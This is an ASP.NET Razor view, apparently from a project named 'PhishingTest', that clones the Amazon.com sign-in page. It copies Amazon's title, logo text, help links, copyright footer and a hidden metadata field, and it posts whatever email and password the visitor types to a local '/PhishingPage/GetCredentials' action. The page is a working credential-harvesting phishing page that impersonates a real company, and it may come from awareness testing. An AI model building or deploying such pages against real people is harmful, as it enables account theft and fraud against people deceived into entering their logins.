@using PhishingTest.Models.Models

<link rel="stylesheet" href="~/css/amazon.css" />

@model Credential

@{
    ViewBag.Title = "Amazon.com : Online Shopping for Electronics, Apparel, Books, DVD's and more";
}

<html>
<body>
    <div class="row">
        <div id="DIV_1" class="col-lg-12 col-centered">
            <div id="DIV_2">
                <div id="DIV_3">
                    <a tabindex="-1" href="/ref=ap_frn_logo" id="A_4"> <i id="I_5"><span id="SPAN_6">Amazon</span></i></a>
                </div>
            </div>
                    <div id="DIV_17" class="col-centered">
                        <form name="signIn" method="post" action="/PhishingPage/GetCredentials" id="FORM_18">
                            <div id="DIV_31">
                                <div id="DIV_32">
                                    <div id="DIV_33">
                                        <h1 id="H1_34">
                                            Sign in
                                        </h1>
                                        <!-- optional subheading element -->

                                        <div id="DIV_35">
                                            <label asp-for="Email" for="ap_email" id="LABEL_36">
                                                Email (phone for mobile accounts)
                                            </label>
                                            <input type="email" maxlength="128" id="INPUT_37" name="email" tabindex="1" />
                                            <div id="DIV_38">
                                                <div id="DIV_39">
                                                    <i id="I_40"></i>
                                                    <div id="DIV_41">
                                                        Enter your email or mobile phone number
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div id="DIV_43">
                                            <div id="DIV_44">
                                                <div id="DIV_45">

                                                    <label asp-for="Password" for="ap_password" id="LABEL_46">
                                                        Password
                                                    </label>
                                                </div>
                                                <div id="DIV_47">
                                                    <a id="A_48" href="https://www.amazon.com/ap/forgotpassword?openid.pape.max_auth_age=0&amp;openid.return_to=https%3A%2F%2Fwww.amazon.com%2F%3Fref_%3Dnav_custrec_signin&amp;prevRID=138ECFW4Z506FEQMKJ8K&amp;openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid.assoc_handle=usflex&amp;openid.mode=checkid_setup&amp;openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&amp;openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;pageId=usflex&amp;openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0">Forgot your password?</a>
                                                </div>
                                            </div>
                                            <input type="password" id="INPUT_49" name="password" tabindex="2" />
                                            <div id="DIV_50">
                                                <div id="DIV_51">
                                                    <i id="I_52"></i>
                                                    <div id="DIV_53">
                                                        Enter your password
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                        <div id="DIV_54">
                                            <span id="SPAN_55"><span id="SPAN_56"><input id="INPUT_57" tabindex="5" type="submit" /> <span id="SPAN_58">Sign in</span></span></span>
                                            <script id="SCRIPT_59">
                                            function cf() {
                                                if (typeof window.uet === 'function') {
                                                    uet('cf');
                                                }
                                                if (window.embedNotification &&
                                                  typeof window.embedNotification.onCF === 'function') {
                                                    embedNotification.onCF();
                                                }
                                            }
                                            </script>
                                            <script type="text/javascript" id="SCRIPT_60">
                                            cf()
                                            </script>
                                        </div>
                                        <div id="DIV_61">
                                            <h5 id="H5_62">
                                                New to Amazon?
                                            </h5>
                                        </div> <span id="SPAN_63"><span id="SPAN_64"><a id="A_65" tabindex="6" href="https://www.amazon.com/ap/register?openid.pape.max_auth_age=0&amp;openid.return_to=https%3A%2F%2Fwww.amazon.com%2F%3Fref_%3Dnav_custrec_signin&amp;prevRID=138ECFW4Z506FEQMKJ8K&amp;openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;openid.assoc_handle=usflex&amp;openid.mode=checkid_setup&amp;openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&amp;openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&amp;pageId=usflex&amp;openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0">Create your Amazon account</a></span></span>
                                    </div>
                                </div>
                            </div>
                            <input type="hidden" name="metadata1" value="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" id="INPUT_66" />
                        </form>
                    </div>

            <div id="DIV_67">
            </div>
            <div id="DIV_68">
                <div id="DIV_69">
                    <div id="DIV_70">
                    </div>
                </div>
                <div id="DIV_71">
                    <span id="SPAN_72"></span> <a href="/gp/help/customer/display.html/ref=ap_desktop_footer_cou?ie=UTF8&amp;nodeId=508088" id="A_73">Conditions of Use</a><span id="SPAN_74"></span> <a href="/gp/help/customer/display.html/ref=ap_desktop_footer_privacy_notice?ie=UTF8&amp;nodeId=468496" id="A_75">Privacy Notice</a><span id="SPAN_76"></span> <a href="/help" id="A_77">Help</a><span id="SPAN_78"></span>
                </div>
                <div id="DIV_79">
                    <span id="SPAN_80">© 1996-2016, Amazon.com, Inc. or its affiliates</span>
                </div>
            </div>
        </div>
    </div>
</body>
</html>